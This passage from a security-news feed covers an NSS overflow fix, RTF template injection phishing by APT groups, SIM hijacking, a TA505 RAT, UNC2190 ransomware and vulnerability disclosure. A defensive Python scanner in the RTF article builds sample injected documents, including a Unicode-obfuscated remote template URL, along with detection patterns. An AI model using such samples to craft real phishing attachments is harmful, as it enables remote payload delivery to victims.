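The checked copy is the whole fix: nothing about the parser changes, the length is simply compared with the size of the destination before the copy. The DER strictness in `parse_der_tlv` is a separate hygiene point; it does not prevent the overflow, since an oversized length can be encoded perfectly validly.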

Although the vulnerability itself is a common buffer overflow and the exploitable code has been in NSS since 2012, none of the internal testing and fuzzing that Mozilla does on a continuous basis, or the external fuzzing done through the OSS-Fuzz program, caught it. Ormandy said this was not the result of poor tooling or processes, but rather the combination of a number of separate factors stemming from the ways in which NSS was fuzzed and tested. One issue is that because NSS is a modular library, each component is tested and fuzzed individually, and another is that the fuzzers testing NSS had a limit of 10,000 bytes of input.

“There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully,” Ormandy said.

“This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.”

<![CDATA[APTs Leverage New RTF Phishing Tactic]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/apts-leverage-new-rtf-spear-phishing-tactic https://duo.com/decipher/apts-leverage-new-rtf-spear-phishing-tactic Wed, 01 Dec 2021 08:00:00 -0500

Researchers are warning of a new phishing attack technique, where attackers leverage a legitimate template functionality in the Rich Text Format (RTF) file format in order to retrieve malicious payloads from a remote URL.

The attack was observed as early as January, but since then researchers with Proofpoint have observed advanced persistent threat (APT) actors increasingly adopting the phishing tactic in the second and third quarters of 2021. Researchers warn that the simplicity of the attack, which they call RTF template injection, sets it up for further widespread use by less sophisticated cybercriminals.

“RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques,” said researchers with Proofpoint on Wednesday.

The attack stems from the document formatting control word for the “*\template” structure, which is part of RTF's plain text document formatting properties. The first part of this structure's value designates a destination, and the second part designates the specific control word function; together, these values signify the destination of legitimate template files to be retrieved. However, it is trivial for attackers to alter the bytes of an existing RTF file and insert a template control word destination that includes a URL resource (instead of an accessible file resource destination). In a real-life attack that would allow a remote payload to be fetched when victims open either .rtf files or .doc.rtf files (RTF files that are opened using Microsoft Word).

This tactic is different from how malicious RTF objects have historically been utilized by cybercriminals. Many of these common attacks include overlay data, or additional data appended to the end of RTF files, in order to embed decoy files that execute attacker-controlled code. For instance, in June, an APT was found sending victims phishing emails that contained RTF files embedded with the RoyalRoad weaponizer.

“While historically the use of embedded malicious RTF objects has been well documented as a method for delivering malware files using RTFs, this new technique is more simplistic and, in some ways, a more effective method for remote payload delivery than previously documented techniques,” said researchers.


This year, researchers observed three APT actors utilizing RTF template injection. The DoNot Team APT group, which has been suspected of being aligned with Indian state interests, was observed leveraging the technique between February and July. The APT’s emails used “defense proposal” lures and appeared to target entities in Pakistan and Sri Lanka. In this attack, the threat group included the template formatting property within a preexisting list override table in the RTF file, which governs the formatting of various document features (such as headers or footers). Specifically, the malicious template control word is embedded in the “wgrffmtfilters” font family control word, said researchers. The APT also utilized a Unicode signed character notation in order to obfuscate the URL value of the RTF file, which researchers believe is a way to evade static detection signatures in antivirus software.

“The ability of RTF files to parse these signed 16-bit Unicode characters provides actors an alternative to using plaintext strings containing a URL, which allows for easy analysis of malicious samples upon detection,” said researchers.
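A triage check for the two variants described above (a plaintext URL in the `\*\template` destination, and the DoNot Team style where the destination is written as signed 16-bit `\uN?` escapes) follows as an added example in Python; it is not Proofpoint's tooling. It walks the whole file for `{\*\template ...}` groups by brace matching, so it also catches a group buried in the font table or a list override table, resolves `\uN?` (negative N means N + 65536) and `\'hh` escapes, and flags a destination that is a URL or UNC path rather than a local file. The three sample documents and the URL in them are constructed for the example, not indicators from the report.

```python
import re
from typing import List, Tuple

TEMPLATE_MARKER = re.compile(r"\\\*\\template\b")
UNICODE_ESC = re.compile(r"\\u(-?\d+)\??")          # signed 16-bit code unit + fallback char
HEX_ESC = re.compile(r"\\'([0-9a-fA-F]{2})")         # \'hh byte escape
CONTROL_WORD = re.compile(r"\\[a-zA-Z]+-?\d* ?")     # any control word left in the body
REMOTE_DEST = re.compile(r"^(?:https?|ftp)://|^\\\\", re.I)   # URL or UNC path
ESCAPED_BACKSLASH = "\ue000"                          # private-use sentinel for a literal "\"


def find_template_groups(rtf: str) -> List[str]:
    """Raw body of every {\\*\\template ...} group, wherever it sits in the document."""
    bodies = []
    for m in TEMPLATE_MARKER.finditer(rtf):
        i, depth = m.end(), 1
        while i < len(rtf) and depth:
            c = rtf[i]
            if c == "\\":            # escaped char (\{, \}, \\) or control word: keep scanning
                i += 2
                continue
            depth += (c == "{") - (c == "}")
            i += 1
        bodies.append(rtf[m.end():i - 1])   # exclude the closing brace
    return bodies


def decode_rtf_text(raw: str) -> str:
    """Resolve RTF escapes in a group body and drop leftover control words and braces."""
    out = raw.replace("\\\\", ESCAPED_BACKSLASH)
    out = UNICODE_ESC.sub(lambda m: chr(int(m.group(1)) % 65536), out)   # signed -> unsigned
    out = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), out)
    out = CONTROL_WORD.sub("", out).replace("\\*", "")
    out = out.replace("{", "").replace("}", "").replace(ESCAPED_BACKSLASH, "\\")
    return out.strip()


def scan_rtf(data: bytes) -> List[Tuple[str, bool]]:
    """(destination, is_remote) for each template group in the document."""
    rtf = data.decode("latin-1")
    found = []
    for body in find_template_groups(rtf):
        dest = decode_rtf_text(body)
        found.append((dest, bool(REMOTE_DEST.search(dest))))
    return found


# Constructed samples; the URL is a placeholder, not an indicator.
URL = "http://example.invalid/template.dotm"
SAMPLE_LOCAL = rb"{\rtf1\ansi{\*\template C:\\Users\\me\\Normal.dotm}\pard Hello\par}"
SAMPLE_PLAIN = b"{\\rtf1\\ansi{\\*\\template " + URL.encode() + b"}\\pard Hi\\par}"
# Same URL hidden as signed 16-bit \uN? escapes, tucked inside the font table
SAMPLE_UNICODE = (b"{\\rtf1\\ansi{\\fonttbl{\\f0\\fnil{\\*\\template "
                  + "".join(f"\\u{ord(c)}?" for c in URL).encode()
                  + b"}Calibri;}}\\pard Hi\\par}")

if __name__ == "__main__":
    for name, sample in [("local", SAMPLE_LOCAL), ("plain", SAMPLE_PLAIN), ("unicode", SAMPLE_UNICODE)]:
        for dest, remote in scan_rtf(sample):
            print(f"{name:8s} {'REMOTE' if remote else 'local '} {dest}")
```

A destination flagged as remote is a strong signal but not proof on its own: a legitimate template can live on a network share, so the UNC case deserves a look at the host rather than an automatic block.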

Between April and September, researchers observed TA423, a China-related APT actor, send phishing emails that targeted the Malaysian deep water energy exploration sector and contained RTF files as attachments. These RTF files included remote template injection URLs in plaintext, which referenced external content in plain sight in the strings of the attachments.

“Of note is that this threat actor also weaponized the RTF files by using a different section of the document formatting properties than was previously observed among the DoNot Team campaigns,” said researchers. “This actor chose to modify a preexisting enclosing group with a font family control word rather than the wgrffmtfilters group previously discussed.”

Most recently, on Oct. 5 the Gamaredon APT actor was observed leveraging the tactic in emails that utilized Ukrainian governmental file lures. The APT, linked to the Russian government, utilized RTF template injection documents that communicated with an external domain. In this attack, Microsoft Office documents used the remote template injection tactic to retrieve the malicious payloads, and in some cases used an MP3 file as a delivery resource. Gamaredon also used this tactic alongside several other attachment delivery methods - including Office and XML template documents - that all shared a single URL, leading researchers to believe the APT is experimenting with new file types.

Researchers said that this new phishing method is an expanding threat surface for organizations globally, and they expect it to be utilized by less sophisticated threat actors in addition to APTs.

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” said researchers.

<![CDATA[SIM Hijacking Attack Lands Hacking Group Member in Jail]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/hacking-group-member-jailed-for-sim-hijacking-attack https://duo.com/decipher/hacking-group-member-jailed-for-sim-hijacking-attack Wed, 01 Dec 2021 00:00:00 -0500

A member of an international hacking group known as The Community has been sentenced to 10 months in prison in connection with a multi-million dollar SIM hijacking attack.

Garrett Endicott, 22, of Warrensburg, Missouri, was first indicted in 2019, and is the sixth and final member of The Community to be sentenced, according to the Department of Justice on Tuesday. The group launched SIM hijacking (also known as SIM swapping) attacks in order to steal cryptocurrency from victims across the country, including ones in California, Texas and New York.

“The actions of these defendants resulted in the loss of millions of dollars to the victims, some of whom lost their entire retirement savings,” said Acting U.S. Attorney Saima Mohsin in a statement. “This case should serve as a reminder to all of us to protect our personal and financial information from those who seek to steal it.”

SIM hijacking attacks occur when bad actors steal victims' mobile phone numbers and route their phone calls and SMS messages to attacker-controlled devices. They are typically able to carry out this attack by convincing a mobile phone provider employee (either by bribery or by posing as the victim) to swap a victim's phone number to an attacker-controlled SIM card. After stealing these phone numbers, attackers can use them to reset passwords on various online accounts - including email, cloud storage and cryptocurrency exchange accounts. Since attackers also have control of the phone numbers, this allows them to bypass two-factor authentication (2FA) security measures as well.

In total, The Community stole millions of dollars worth of cryptocurrency, stealing anything from $2,000 to over $5 million from individual victims.

Endicott, who pleaded guilty, must pay $121,549.37 in restitution in addition to his sentence. Other members of the group that have been sentenced include Ricky Handschumacher, 28, of Pasco County, Florida; Colton Jurisic, 22, of Dubuque, Iowa; Reyad Gafar Abbas, 22, of Charleston, South Carolina; Conor Freeman, 22, of Dublin, Ireland and Ryan Stevenson, 29, of West Haven, Connecticut.

SIM hijacking is a major security challenge both for wireless carriers and their mobile customers, with criminals estimated to have stolen millions of dollars in this way. In February, Europol announced it had arrested 10 criminals affiliated with a gang that made over $100 million in cryptocurrencies after targeting thousands of victims with SIM hijacking attacks throughout 2020 - including famous internet influencers, athletes and musicians.

However, beyond these law enforcement crackdowns, government officials have sought to put the issue on the Federal Communications Commission’s (FCC) radar over the years. In 2020, a group of senators and representatives asked the FCC to require wireless carriers to better safeguard consumers from this type of attack. In the letter, government officials stressed that the fraudulent attack could endanger national security, if a cybercriminal uses the attack to hack into the email account of a public safety official, for instance.

Currently, the FCC relies on Customer Proprietary Network Information rules, as well as Section 222 of the Communications Act of 1934, to protect consumer data. These rules require carriers to implement several protections against attackers gaining unauthorized access to customers’ private data. The FCC also has pointed to regulations (Local Number Portability rules) that govern the porting of phone numbers from one carrier to another.

In September, the FCC proposed to amend these rules with the intent of cracking down on SIM hijacking. In its proposal, the commission looked at various ways to bolster security, including additional fields of customer-provided information needed to validate wireless-to-wireless ports, or a customer initiated passcode field for wireless number port requests.

“It’s important we do this now… four out of five SIM swap attempts in the United States are successful,” said Jessica Rosenworcel, acting chairwoman of the FCC, in a statement. “We can help fix this. I look forward to the record that develops and putting an end to this cyber fraud.”

<![CDATA[TA505 Seen Using P2P RAT in New Operations]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/ta505-seen-using-p2p-rat-in-new-operations https://duo.com/decipher/ta505-seen-using-p2p-rat-in-new-operations Wed, 01 Dec 2021 00:00:00 -0500

A threat group known for deploying the Clop ransomware and Dridex trojan is now using a unique remote administration tool that can communicate directly with other compromised hosts via a peer-to-peer network.

Researchers at NCC Group have been tracking the activity from a group known as TA505 for several months and they’ve discovered at least three distinct networks of infected machines. The RAT that the group is deploying bears some resemblance to other tools that TA505 uses, such as a similar programming style to a tool known as Grace that the group has deployed for several years.

TA505 is a venerable group and, like many other cybercrime groups, it has shifted tactics many times over the years in order to keep ahead of defenders and maximize profits. The group started out as a typical cybercrime crew, performing network intrusions to facilitate fraudulent bank transfers to accounts they controlled. TA505 also took advantage of a close association with EvilCorp, a notorious cybercrime group that is best known for its use of the Dridex banking trojan. The TA505 actors used Dridex as well, but eventually moved on.

“However in 2017 TA505 went on their own path and specifically in 2018 executed a large number of attacks using the tool called ‘Grace’, also known publicly as ‘FlawedGrace’ and ‘GraceWire’. The victims were mostly financial institutions and a large number of the victims were located in Africa, South Asia, and South East Asia with confirmed fraudulent wire transactions and card data theft originating from victims of TA505,” a report by Nikolaos Pantazopoulos and Michael Sandee of NCC Group says.


“The tool ‘Grace’ had some interesting features, and showed some indications that it was originally designed as banking malware which had later been repurposed. However, the tool was developed and was used in hundreds of victims worldwide, while remaining relatively unknown to the wider public in its first years of use.”

The new RAT that NCC Group discovered is relatively simple and includes three individual components: a downloader, a signed driver, and a tool that performs the communication with other nodes on the network. Once the downloader is on a new machine, it checks the operating system version and then contacts the remote command-and-control server and downloads several other files, including the P2P binary itself, some drivers, and lists of processes, drivers, services, registry keys, and files to filter.

The signed driver that the downloader installs performs most of the other pertinent actions, such as decrypting shellcode, copying it, and then running the payload. The P2P functionality in the RAT uses the UDP protocol for communication.

“After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself into the network and then exchange information,” the researchers said.

NCC Group didn’t specify where the targets of the new RAT are, but TA505 has been known to target a wide range of organizations around the world in past operations.

<![CDATA[VirusTotal Adds Collections Feature for Better Collaboration and Context]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/virustotal-adds-collections-feature-for-better-collaboration-and-context https://duo.com/decipher/virustotal-adds-collections-feature-for-better-collaboration-and-context Tue, 30 Nov 2021 00:00:00 -0500

VirusTotal, a key repository of malware samples and suspicious files for security researchers and defenders, is introducing a new service that enables users to collaborate and share data and indicators of compromise in real time.

The Collections feature allows any user to create a new collection for a file or malware sample that includes a variety of different IOCs, such as file hashes, domains or URLs or other information. The collection can also include a description and VirusTotal will add other information to the collection, such as tags and metadata.

Researchers and security teams often use informal methods such as Twitter, Pastebin, or Dropbox for sharing IOCs, threat intelligence, hashes of malware samples, and lists of suspicious domains. There are also a number of private forums in which that information is shared, but those tend to be small and so data is not disseminated widely. Those methods work for specific use cases, but getting threat information out to the widest possible audience of defenders and researchers can make a significant difference in heading off attacks.

The VirusTotal Collections feature is designed to enable researchers and defenders to update their contributions as needed and allow others to consume them.

“Collection owners can update these by adding or removing IoCs. They are public via our UI and API, and they can be shared using their permalink. This makes it a very convenient way of linking to listings of IoCs in blog posts, research reports and the like,” Juan Infantes of VirusTotal said in a post.

VirusTotal has been the default platform for checking potentially malicious files and URLs for many years, and has evolved into a resource for community sharing and discussion, as well.

“Time evolves and now most investigations go beyond one observable, quickly adding up several indicators of compromise (IOCs) for one single incident. With many security researchers sharing their findings in blog posts and tweets, it’s getting hard to keep track of all these data inputs. Moreover, these investigations change over time bringing more difficulty into reporting the new findings,” Infantes said.

<![CDATA[Ransomware Group Continually Rebrands to Slip Under Radar]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/ransomware-group-continually-rebrands-to-slip-under-radar https://duo.com/decipher/ransomware-group-continually-rebrands-to-slip-under-radar Mon, 29 Nov 2021 00:00:00 -0500

A ransomware operator has continually rebranded itself over the past year in order to evade detection, while launching cyberattacks on critical infrastructure across several industries.

Researchers with Mandiant detailed a threat group called UNC2190, which is an operator behind an affiliate ransomware program. Since June, researchers said they have observed the group targeting the education, health and natural resources sectors in the U.S. and Canada. However, its activities trace back to at least July 2020, and since then the group has rebranded several times.

“UNC2190 has continued to operate over the past year while making only minor changes to their strategies and tooling, including the introduction of a commercial packer and the rebranding of their service offering,” Tyler McLellan and Brandan Schondorfer, with Mandiant, said on Monday. “This highlights how well-known tools, such as Beacon, can lead to impactful and lucrative incidents even when leveraged by lesser-known groups.”

Researchers said that UNC2190's rebrands, coupled with the fact that it is lesser known and potentially smaller, means the group is able to avoid public scrutiny. In July 2020, researchers said that the group deployed ransomware called Rollcoast while branded as “Eruption.” In June 2021, the group rebranded itself as “Arcane” and released a web portal aimed at publicly shaming victims, likely in an attempt to further extort them. Researchers observed three victims being publicly extorted in this way in June.

Then in October, researchers observed a new public shaming web portal and blog from a group calling itself “Sabbath.” This appeared to be yet another rebranding effort, as the web portal and blog were nearly identical to that of “Arcane,” including the same text content, consistent grammatical errors, and only minor changes to the name, color scheme and logo.

Researchers observed victims being publicly extorted via this newer web portal in mid-November, when six victims were added over the course of two days. UNC2190’s victims include a Texas school district, which was hit with a cyberattack in September. The threat group made a multi-million dollar ransom demand for this victim and emailed its staff, parents and even students to put further pressure on the district.

“UNC2190 uses a multifaceted extortion model where ransomware deployment may be quite limited in scope, bulk data is stolen as leverage, and the threat actor actively attempts to destroy backups,” said McLellan and Schondorfer.

Researchers first came across UNC2190's activities when they identified posts on various Russian language hacker forums that sought out partners with access to commercial networks. UNC2190 was offering to pay a percentage of successful ransom payments collected to the hackers that provide access, exfiltrate stolen data, delete backups, and carry out portions of their ransomware operations, said McLellan.


The Rollcoast ransomware, first observed in use by UNC2190 in July 2020, is a dynamic link library (DLL) that encrypts files on logical drives attached to a system. The ransomware has various features allowing it to evade detection: For instance, it had only one ordinal export, which researchers believe could mean the sample was designed to sidestep detection and be invoked within memory, potentially through the Beacon malware provided to affiliates. The Rollcoast ransomware would also check the system language and exit if it detected a non-supported language code (from Russia, Turkey or Albania, for instance). This is a common practice for ransomware families, and helps them avoid encrypting systems in Russia and other Commonwealth of Independent States countries, potentially to avoid attracting attention of law enforcement in countries where ransomware operators or affiliates may reside, said researchers.

“Mandiant only observed Rollcoast in one incident which was attributed to UNC2190," said Schondorfer. "In this incident, Mandiant Consulting captured Rollcoast in memory. Since Rollcoast appears to be designed to be loaded into memory by Beacon, this has allowed UNC2190 to avoid leaving copies of the ransomware on disk at any victims and kept ROLLCOAST from showing up on VirusTotal and other malware repositories.”

Since July 2020, UNC2190 has been offering affiliates pre-configured Beacon backdoors, the payloads that are part of the Cobalt Strike commercial adversary simulation software. Cobalt Strike is marketed to red teams but has also been stolen and utilized by ransomware operators. However, researchers said that an affiliate program operator supplying its own pre-configured Beacon to affiliates is “unusual” and complicates attribution. These payloads contain “unique malleable profile elements” specific to affiliates in its program; researchers observed, for instance, that samples included GET requests that ended with kitten.gif.

Ransomware groups have typically rebranded as a way to fly under the radar. Researchers have suggested, for instance, that the DarkSide ransomware gang rebranded as the BlackMatter ransomware operation. These rebrands come as federal agencies crack down both on ransomware operators and on the way that ransom payments are made, following the Colonial Pipeline attack in May.

“The targeting of critical infrastructure by ransomware groups has become increasingly concerning as evidenced by governments moving to target ransomware actors as national security level threats with particular attention to groups that target and disrupt critical infrastructure,” said McLellan and Schondorfer.

<![CDATA[Q&A: Casey Ellis]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/q-and-a-casey-ellis https://duo.com/decipher/q-and-a-casey-ellis Wed, 24 Nov 2021 08:00:00 -0500

Casey Ellis, founder, chairman and CTO of Bugcrowd, recently joined Lindsey O’Donnell-Welch on the Decipher podcast to discuss how vulnerability disclosure programs are changing. This is a condensed and edited version of the conversation.

Lindsey O’Donnell-Welch: What first inspired you to focus on vulnerability disclosure as part of your career? Was there an epiphany moment or experience that made you want to focus in on this, or did it just happen?

Casey Ellis: No, there were definitely a couple of epiphany moments. I've always loved hacking, and innovation as an adjacent train of thought to hacking, so that was the precursor to it. With Bugcrowd, that meant really just looking at traditional solutions, traditional approaches, when it comes to outsmarting the adversary, and realizing that the math is wrong if there's lots of people building software, and doing awesome stuff, making mistakes that introduce vulnerabilities in the process. And then you've got this undefined crowd of adversaries with their own incentive to find those issues and exploit them. One person being paid by the hour, no matter how good they are, is eventually going to lose. I think the irrational founder gene in me got locked on that idea and I wanted to try to find ways to solve it. I think, on the other side of it, having grown up in the hacker community, wanting to keep my buddies out of jail, in a sense, that side of it in particular ended up turning into Disclose.io. But on the background part of things, it was really about how do we normalize and promote the role of the hacker, and people that can think differently and do bad things to computers, but for good reasons. How do we normalize that in the market? Because at that point in time, if you're a hacker, you're inherently bad and inherently evil. I think in the 10 years since there's been a lot of progress in folks getting their head around the idea of there being like a digital locksmith, and not that we're just all burglars or something like that.

Lindsey O’Donnell-Welch: One major part of vulnerability disclosure, and the conflict that we've seen around that, has been how hackers are perceived by companies at a broader level. How has the term “hacker” changed since you first started looking at vulnerability disclosure policies over the past decade?

Casey Ellis: I think "hacker" is still definitely a term that frightens some people. I think the broader view - in technology now, not just in security - is that it is actually a dual-use concept. It's not a concept that has an inherent moral loading, which is kind of where we started: If you're doing this sort of thing in technology, that means you must be nefarious or malicious, and therefore, we shouldn't trust you. Therefore, if you're a hacker, you're a bad person, please go away. I think we're past that now, broadly speaking, to the point where people see it as a morally agnostic skill set or craft or trade. And it really becomes a question at that point of where you draw your ethical lines as you do the hacking thing, so to speak. We've put a lot into this, as have a bunch of others over the years, to try to reclaim the word “hacker,” and I don't feel that will ever be a solved problem fully. But I think reintroducing this idea of it being possible for that sort of thing to be done in good faith, that wasn't true when we started. I believe it is true now, which is awesome.

Lindsey O’Donnell-Welch: You still hear these stories, like back in 2017, you had the whole incident with the DJI, the drone maker, and the security researcher who tried to report a bug and was met with threats. And even this past year, you have the drama with the Missouri governor who was vowing he would prosecute a journalist who reported a security flaw. So we're still seeing these types of incidents crop up, but then at the same time, I would say that there have been a lot of positive initiatives in the U.S. government: Look at Hack the Pentagon or even this past year, CISA and the DHS have done a pretty good job of making it known that they want to recruit hackers, and that this is a good thing.

Casey Ellis: Most definitely, I think CISA’s work around the binding operational directive that they put out with OMB to mandate that across the U.S. federal government, they put a lot of work into really explaining what was going on to a bunch of folks that would probably be unfamiliar with it at first pass. Because that is the starting point, when you talk to someone about hackers being helpful, and now they're going to tell you where you've made a mistake, like that can be quite an unusual and confronting idea the first time you hear it, so you have to basically take people through the why and the process and why it's actually really important as something that you do.

The other thing that CISA put a lot of work into was including Safe Harbor clauses in the recommended boilerplate language. Some of the stuff actually drew from Disclose.io and it ended up with parts of it going back into Disclose.io as an open source standardization project. And that's really reflective of the fact that the laws haven't caught up with this idea of dual-use and the ability to hack in good faith. Most things are still written in a way that assumes that you're breaking the law, and you've got to prove that you aren't, which is not like most other crimes. So, the idea of putting templates out there that allow organizations to create a carve out for people that are working in good faith; that, again, is something that's fairly novel, and fairly hard to do. When lawyers get led into uncharted territory, they tend to get quite verbose in the interest of being legally complete, and that ends up being confusing for folks. So CISA did a really good job of shortcutting that, and Bugcrowd’s proud to be the partner of choice on actually delivering those VDPs and, in some cases, bug bounty programs, out to the federal government here in the U.S.

Lindsey O’Donnell-Welch: That partnership, can you talk a little bit more about the impact of that, especially across different government agencies, and how the rollout has been?

Casey Ellis: Yeah, definitely, the big thing is that it's not as simple as just putting a policy out there on a website, and then opening an email inbox, and then optionally offering to pay people if you're taking a VDP and actually turning it into a bug bounty program. There's the vulnerability triage, there's the remediation workflows, there's making sure that information gets to the right place within the organization, so that stuff can get fixed. And in the meantime, there's someone who's found an issue who's waiting for a response and trying to understand whether or not they've been helpful and if that thing's gonna get fixed. All of that process needs management and that's a lot of what Bugcrowd built out in the form of our team and the stuff that we built into the platform to really simplify that, to specialize in doing that sort of thing well. Government agencies aren't usually on the cutting edge of technology, they oftentimes need a fair bit of help with implementing new ideas like this one, so this is where we come in to help them actually run the program but also guide them through setting it off if that's needed as well.

Lindsey O’Donnell-Welch: I’ve heard plenty of stories of companies that want to start rolling out a program but they don't think about the triage, as you say, or the reporting aspect of it or even being able to handle the kind of the different vulnerabilities that come up.

Casey Ellis: Yeah definitely. With starting it up, this is something that we saw a lot of early on in Bugcrowd when bug bounty as a concept got a bit of a halo effect around it. And that still exists. But early on that was the dominant feature, people just wanting to do it because they wanted to get in TechCrunch and make a big noise about how good they were at security without necessarily thinking through the downstream adjustments that it's ultimately meant to cause. To me, public programs, in particular vulnerability disclosure and bug bounty programs, the thing that's actually the most powerful about them is recognition outside of the security team within the organization that “yeah, mistakes happen, to err is human, we are going to have things that are vulnerable that we didn't intend to put there.” That's not a truth to hide from, that's a truth to basically just accept, and then try to start working with. Let's operate on the assumption that to err is human, let's figure out where the risks that are introduced as a byproduct of that exist, fix those, and then try to learn from that in ways that reduce how frequently that happens in the future. You can't just run headlong, that's not a switch that you can necessarily flick on as an organization, it's usually a process of crawling first and walking and then running.

“Let's operate on the assumption that to err is human, let's figure out where the risks that are introduced as a byproduct of that exist, fix those, and then try to learn from that in ways that reduce how frequently that happens in the future.”

Lindsey O’Donnell-Welch: Right, and even adopting that as a mindset, that security errors are going to happen, and that mistakes will happen, that seems to me like it could be a whole entire cultural mind shift for the work environment. So it's more tough than even just rolling out a simple program. It's the entire environment that needs to change.

Casey Ellis: Yeah, and even the management culture, leadership, elite, all these different things, I'm increasingly convinced - doing all this stuff with Bugcrowd, with Disclose.io, having worked in security pretty much since I finished high school, I'm passionate about this space of vuln disclosure and crowdsourcing, but I'm just fascinated with security in general as a concept - and thinking about it through that lens, I'm increasingly convinced that a lot of what we see on the internet is the product, ultimately, of people not thinking that that would be possible in the first place. Like this idea of “ostrich risk management,” I call it, where if you bury your head in the sand, all of a sudden, the problem won't matter anymore. I think there's been a period of time in technology and on the internet, where that has actually been true, where people have gotten away with not doing as much as they maybe should have. But especially over the past two years with changes in the use of technology, and I think changes in adversary behavior as well, that's fairly obviously not a good strategy going forward. So helping people make that shift is something that we do a lot.

Lindsey O’Donnell-Welch: When companies are looking at these good faith type policies and they're putting their heads together, where is that decision making process being handled? Is there any kind of collaboration with security teams?

Casey Ellis: Usually, left to its own devices, it'll be the security or the product team, in some cases, they just pick something up, do copy, paste and kind of slap it on our website, and off it goes from there. That's the thing that happens sometimes. More often, though, they'll interact with the in-house counsel or external counsel, sometimes the marketing team gets involved, to make sure that the verbiage is on brand and different things like that. It can end up becoming quite an involved process and a bit of a decision by consensus. And that often is why these policies end up being a million pages long and having all sorts of confusing stuff in them, because everyone wants to add something. That's a part of what Disclose.io puts out there as a boilerplate to say, here's the simplest possible version of this, that's going to be as complete as it can be. And frankly, this is where Bugcrowd comes into it as well, in terms of helping organizations navigate that, when they've got different stakeholders that are trying to work out is this a good idea or not? How do we frame the language to make it safe? All those different things that can be a pretty complicated conversation to have for the first time I think, for folks that have been through it before it gets a lot easier. But if you've never interacted with this sort of thing before it can be quite like “Whoa, what the hell are we doing?” So oftentimes we’ll get involved as Bugcrowd to actually help basically align those stakeholders, understand what the different concerns are, and try to bring that back to a midpoint.

Lindsey O’Donnell-Welch: You've had experience both in Australia, and then also San Francisco - you may have a good perspective on how the state of vulnerability disclosure is different around different areas of the globe right now. Is there any place worldwide where they might have more mature vulnerability disclosure guidelines, or rules in place?

Casey Ellis: I'll speak to the ones that are more mature. The Netherlands have been really good with this stuff for a long time. There's the t-shirt, “I hacked the Dutch government, and all I got was this lousy t-shirt,” like that has been around for 12 or 13 years, and it's a collectible. So those guys in particular are a country that basically, at some point in time, decided that this was really important, put the effort into standardizing it and normalizing it, and have reaped the benefits from it since. Estonia is pretty amazing as well. It's interesting, because you've got these smaller countries population wise that are able to be a bit more agile, that just decide to do a thing and then go off and do it. Honestly, I think the U.S. has been pretty incredible in terms of its leadership in this area. You know once the Hack the Pentagon stuff got rolling, that kind of rolled downhill? You know, in terms of congressional bills, Hack the XYZ, coming out of Congress, and then you know, BOD 20-01 out of DHS and OMB. Australia is catching up, we’re talking a lot with the Department of Home Affairs around their cybersecurity strategy, and they included vulnerability disclosure in one of the four recommendations or four primary recommendations in that document... But in terms of it being a thing that we just do, I'd say that they're a little further back from the U.S. or our Dutch friends. But there's work going into basically correcting that. And I'd say the same goes for the Singaporean government, it’s working really actively on this stuff, or Dubai. There's different places around the world where you see it switched on. And it gets moving from there. So there's lots of activity in Europe around starting to fold this in behind some of the leading edge stuff they did around privacy, because you can't really have privacy without security. So this is coming in behind that as a way to make sure that some of the stuff they've done to protect citizens’ data is actually possible in the first place. Because the controls have integrity to them. So in general, it's a mishmash... at this point in time, there's a decent cohort of countries that are basically, you know, actively working on catching up.

Lindsey O’Donnell-Welch: Looking ahead to 2022, do you see any big trends emerging when it comes to vulnerability disclosure? I know that you have your Inside the Mind of a Hacker Report too, I would love to hear any kind of takeaways from that as it relates to where things are going.

“I think the pandemic has driven a lot of introspection, in the community and on the researchers’ side, with people wanting to take better control of their destiny, so to speak, from a career standpoint.”

Casey Ellis: Yeah, most definitely. I do think we're heading into another year that has a lot of elections in it. And I think at this point in time, the relationship between information warfare and cybersecurity, that's always been a thing, but I think it really showed its head in 2020 in a way that a lot of people understood, in a way that they hadn't really understood before. There's a lot of stuff coming up next year, the midterms here in the U.S., there's probably going to be a federal election in Australia, and lots of other countries. So those are all opportunities for that subject to come back up. And it does come back to like, to what degree can we trust the systems that we rely on to actually conduct the democratic process? To me that's a really important question to be able to answer, I do see VDP as a fundamental tool to combat both the security side of that, and also the information warfare side of that, because you can go to a voter, even if they're non-technical, and say, it's neighborhood watch for the internet, and they'll get it right. Doesn't mean that it's perfect, but it means that I've just explained to you something that we are doing to try to keep your vote and your information safe, which is good. I see that playing out pretty interestingly next year.

Probably another one is just the temerity of attackers just in general. People don't seem to care as much about getting caught anymore. And that, to me, was a pretty big shift in attacker behavior that started in 2020, but has continued and I think spilled over into the ransomware groups and cybercriminal operators in 2021. That combined with the fact that ransomware operators, their business models are working quite well. So that means that there’s a lot of money to spend on tooling and innovation. So reinvesting some of those proceeds into being more effective, where that goes next, I'm not sure, but as an entrepreneur, putting myself in their shoes, that's probably what I'd be working on right now. So I'd expect to see the outcome of that start to play out next year. That one's a little terrifying. But I think just staying on top of it, there's a lot of work going into that just to combat ransomware, not so much as a specific type of malware. It used to be that attackers could only monetize things that were of value when they stole them, but ransomware basically introduced this idea of denying service and being able to monetize that, which broadens the scope of your potential attack surface as a criminal operator. So if it works, it's going to continue to happen because that's how capitalism works.

